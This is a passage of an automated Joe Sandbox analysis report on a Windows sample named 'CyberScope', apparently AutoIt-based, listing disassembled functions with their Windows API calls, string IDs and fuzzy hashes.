                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                    • String ID: 0$2
                                                                                    • API String ID: 93392585-3793063076
                                                                                    • Opcode ID: 236ca3eaea17550c695ef8c8c53271cfa7206d70fab0f52e5c52489a41af78f6
                                                                                    • Instruction ID: b4375e96764f130725b4d677c51e70c2dc0371b99a6c72dc3b7a1564d3c2798b
                                                                                    • Opcode Fuzzy Hash: 236ca3eaea17550c695ef8c8c53271cfa7206d70fab0f52e5c52489a41af78f6
                                                                                    • Instruction Fuzzy Hash: 3B51C07060020DABDF20EFA8DA88BBEBBF4AF54314F24421AEA11D7295D3709941DF91
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • BeginPaint.USER32(?,?,?), ref: 00191B35
                                                                                    • GetWindowRect.USER32(?,?), ref: 00191B99
                                                                                    • ScreenToClient.USER32(?,?), ref: 00191BB6
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00191BC7
                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00191C15
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001D3287
                                                                                      • Part of subcall function 00191C2D: BeginPath.GDI32(00000000), ref: 00191C4B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                    • String ID: (&
                                                                                    • API String ID: 3050599898-1801568203
                                                                                    • Opcode ID: 828110973529d32fc9d99c812e16ba077d15be428d754d2462db527d1c439551
                                                                                    • Instruction ID: e54fdf11bfba5dc39d1404d48548d285c7708591468c9f75b0b98c7f6acb49d1
                                                                                    • Opcode Fuzzy Hash: 828110973529d32fc9d99c812e16ba077d15be428d754d2462db527d1c439551
                                                                                    • Instruction Fuzzy Hash: D041D370505701BFDB20DF24EC88FB67BA8EB55320F140669F965872A1C7709989DB62
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00228740
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00228765
                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0022877D
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 002287A6
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0020C1F2,00000000), ref: 002287C6
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 002287B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                    • String ID: (&
                                                                                    • API String ID: 2294984445-1801568203
                                                                                    • Opcode ID: 8c932c36be862f15007ea5e2d852b3bae53260fb319b3c8f5090b12209cc05b8
                                                                                    • Instruction ID: 7023fb99082f65bd5ca6a5e444daea808328a7886b13ac931c8fa2fa376ce5e2
                                                                                    • Opcode Fuzzy Hash: 8c932c36be862f15007ea5e2d852b3bae53260fb319b3c8f5090b12209cc05b8
                                                                                    • Instruction Fuzzy Hash: DA218675621252FFCB245FB8EC08A6AB7A5EB44325F344629F926D21E0EF70D861CB10
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 001FD1BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    • Opcode ID: e35f8e86a5fcbf42a365cc3a78add45a31e19d17adcf8f54a270a30b85df50c8
                                                                                    • Instruction ID: a5fed3120f1182999e57f921313b78a894ef702af3dbf4b26c8b7a6faa38dedc
                                                                                    • Opcode Fuzzy Hash: e35f8e86a5fcbf42a365cc3a78add45a31e19d17adcf8f54a270a30b85df50c8
                                                                                    • Instruction Fuzzy Hash: 4B11EC3539C30EBBEB095B54FC82DBA779D9F29761B21002AFA04A61C2E7B46A404264
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 642191829-3771769585
                                                                                    • Opcode ID: 05eeec9a08d920104e5950b4ed540a813c601e94fd92c2246dfb2580c8c488d0
                                                                                    • Instruction ID: 052d87c062987e62d73ac7776dc467ce416af22326a11ab0e5abdc07ca985a0b
                                                                                    • Opcode Fuzzy Hash: 05eeec9a08d920104e5950b4ed540a813c601e94fd92c2246dfb2580c8c488d0
                                                                                    • Instruction Fuzzy Hash: A911D6319041197FDB247B74EC4EEEE7BACEF11710F110175F605A60A1EFB48A869690
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001FF447
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001FF45D
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 001FF46C
                                                                                    • OpenProcess.KERNEL32(h i%,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001FF47B
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001FF485
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001FF48C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID: h i%
                                                                                    • API String ID: 839392675-413156025
                                                                                    • Opcode ID: e3af029de895a526090056062b97d7d06f0aef9b7bdd0ef1b8b960925e791fe2
                                                                                    • Instruction ID: c20920829f7e505920652f743c97e24c31cb40be27b2db1c30d67daf315a6245
                                                                                    • Opcode Fuzzy Hash: e3af029de895a526090056062b97d7d06f0aef9b7bdd0ef1b8b960925e791fe2
                                                                                    • Instruction Fuzzy Hash: 25F03A36241158BBE7315BA2AC0EEEF7B7CEFC6B11F001058FA0591090D7A46A02DAB5
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 952045576-0
                                                                                    • Opcode ID: 869b176739e1b6deadac61a1ad98afad412af48915ba01f44648cb617452cd0c
                                                                                    • Instruction ID: b18053b101f665b2e88d7634198d6b404c5f03bf2d4136ec90d0bd73eda21b5a
                                                                                    • Opcode Fuzzy Hash: 869b176739e1b6deadac61a1ad98afad412af48915ba01f44648cb617452cd0c
                                                                                    • Instruction Fuzzy Hash: D341D765C10118B6CB11FBF8CC8AADFB7A8AF15710F508566E608E3122FB74D255C3E6
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 002237B7
                                                                                    • GetDC.USER32(00000000), ref: 002237BF
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002237CA
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 002237D6
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00223812
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00223823
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00226504,?,?,000000FF,00000000,?,000000FF,?), ref: 0022385E
                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0022387D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3864802216-0
                                                                                    • Opcode ID: f249f63d4cbd603e51d20a7f8bd340cacbf30b71c87a24fe4835fb647e7bd1b2
                                                                                    • Instruction ID: 0a248d36e94289f4799562cdb58bb6f5dec312a2dc015f8dfd4bacf521f9d2d3
                                                                                    • Opcode Fuzzy Hash: f249f63d4cbd603e51d20a7f8bd340cacbf30b71c87a24fe4835fb647e7bd1b2
                                                                                    • Instruction Fuzzy Hash: 4E31A2751112247FEB218F90EC49FEB3BADEF49711F044065FE089A191C6B99D51C7A4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 001c05b198944d51cab26dbe3fb92758a63a50c348a3c15493f7a6a554f561ce
                                                                                    • Instruction ID: b50dce6baa1211c7d580e7cfe7d28a2c329e8119eebe5ae87b36f7f5f8479c9c
                                                                                    • Opcode Fuzzy Hash: 001c05b198944d51cab26dbe3fb92758a63a50c348a3c15493f7a6a554f561ce
                                                                                    • Instruction Fuzzy Hash: B3D1B271A1061ADFDB10CF58D885AEEB7F5FF98304F1480A9E915AB281D770DD91CB90
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001D1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001D194E
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 001D19D1
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001D1B7B,?,001D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 001D1A64
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 001D1A7B
                                                                                      • Part of subcall function 001C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B0165,?,?,002011D9,0000FFFF), ref: 001C3BC5
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 001D1AF7
                                                                                    • __freea.LIBCMT ref: 001D1B22
                                                                                    • __freea.LIBCMT ref: 001D1B2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                    • String ID:
                                                                                    • API String ID: 2829977744-0
                                                                                    • Opcode ID: ad69513e7db97be329fbd54a0dbc28753e47c33d176749ea48990bf2a0b17b4c
                                                                                    • Instruction ID: 7ab9a6db9a833d48cd37d0c4a8bc7ed38ec68f65442f6d19f49f541cfff635f2
                                                                                    • Opcode Fuzzy Hash: ad69513e7db97be329fbd54a0dbc28753e47c33d176749ea48990bf2a0b17b4c
                                                                                    • Instruction Fuzzy Hash: C591D372F00256BADF288EA4C8A1EEE7BB5AF19314F19061BE915E7381E735DC40C760
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 2610073882-625585964
                                                                                    • Opcode ID: e64930a657b173c269f6e503e1be37bc1a0c8eb6cb9685832b0068a3c9c53377
                                                                                    • Instruction ID: dbc820aab3d5dcf4ad8e7f5facdecfe5e48fff6604b1311924db808601a27cce
                                                                                    • Opcode Fuzzy Hash: e64930a657b173c269f6e503e1be37bc1a0c8eb6cb9685832b0068a3c9c53377
                                                                                    • Instruction Fuzzy Hash: 9A918371A20625EBDF20CFA4C844FEE7BF8AF99314F108559F515AB140D7B09995CFA0
                                                                                    APIs
                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00201C1B
                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00201C43
                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00201C67
                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00201C97
                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00201D1E
                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00201D83
                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00201DEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                    • String ID:
                                                                                    • API String ID: 2550207440-0
                                                                                    • Opcode ID: a5f3c846a27a9d756e9c0a1001bfdf07a10f7983306e17c65a7fc04bf7f6e79f
                                                                                    • Instruction ID: 026e8f2c414a4d38c01127e646387dad5ea4d8f6e26b8ef0f7830f4776fd3e4f
                                                                                    • Opcode Fuzzy Hash: a5f3c846a27a9d756e9c0a1001bfdf07a10f7983306e17c65a7fc04bf7f6e79f
                                                                                    • Instruction Fuzzy Hash: 8F91DF71A10319AFEB01DF98C885BBEB7B4FF05715F14802AE940AB2D2D774E961CB51
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 002143C8
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002144D7
                                                                                    • _wcslen.LIBCMT ref: 002144E7
                                                                                    • VariantClear.OLEAUT32(?), ref: 0021467C
                                                                                      • Part of subcall function 0020169E: VariantInit.OLEAUT32(00000000), ref: 002016DE
                                                                                      • Part of subcall function 0020169E: VariantCopy.OLEAUT32(?,?), ref: 002016E7
                                                                                      • Part of subcall function 0020169E: VariantClear.OLEAUT32(?), ref: 002016F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4137639002-1221869570
                                                                                    • Opcode ID: 683d8cc7809835acb9254d8ba787affa4ff695dbde623544d2d9e94bde32acec
                                                                                    • Instruction ID: 9251fa1ba3fbde5c72a3244f87a2edf5e36b5e9cc78d031ffb68015f08181470
                                                                                    • Opcode Fuzzy Hash: 683d8cc7809835acb9254d8ba787affa4ff695dbde623544d2d9e94bde32acec
                                                                                    • Instruction Fuzzy Hash: 2A916B74A18301AFCB04EF64C48096AB7E5FFA9714F14892DF88A97351DB31ED56CB82
                                                                                    APIs
                                                                                      • Part of subcall function 001F08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?,?,?,001F0C4E), ref: 001F091B
                                                                                      • Part of subcall function 001F08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?,?), ref: 001F0936
                                                                                      • Part of subcall function 001F08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?,?), ref: 001F0944
                                                                                      • Part of subcall function 001F08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001F0831,80070057,?), ref: 001F0954
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002156AE
                                                                                    • _wcslen.LIBCMT ref: 002157B6
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0021582C
                                                                                    • CoTaskMemFree.OLE32(?), ref: 00215837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 614568839-2785691316
                                                                                    • Opcode ID: c5db55e2ff6965770168524b7c39bf8b5d6ccf87e94d3a73b3788ca16376b4f0
                                                                                    • Instruction ID: ea741165f87cc47eafd42c6eda58ea441d83a0d6372a5395e5ebf73c1ecc3de8
                                                                                    • Opcode Fuzzy Hash: c5db55e2ff6965770168524b7c39bf8b5d6ccf87e94d3a73b3788ca16376b4f0
                                                                                    • Instruction Fuzzy Hash: 24914771D1022DEFDF10DFA4D881AEEB7B9BF58304F1041A9E915A7281DB709A95CFA0
                                                                                    APIs
                                                                                    • GetMenu.USER32(?), ref: 00222C1F
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00222C51
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00222C79
                                                                                    • _wcslen.LIBCMT ref: 00222CAF
                                                                                    • GetMenuItemID.USER32(?,?), ref: 00222CE9
                                                                                    • GetSubMenu.USER32(?,?), ref: 00222CF7
                                                                                      • Part of subcall function 001F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001F43AD
                                                                                      • Part of subcall function 001F4393: GetCurrentThreadId.KERNEL32 ref: 001F43B4
                                                                                      • Part of subcall function 001F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001F2F00), ref: 001F43BB
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00222D7F
                                                                                      • Part of subcall function 001FF292: Sleep.KERNEL32 ref: 001FF30A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 4196846111-0
                                                                                    • Opcode ID: bb2c4b4c14cdcaf748d0c23c7bfdaf7aae05718ef51b58f003a4cd3138775bce
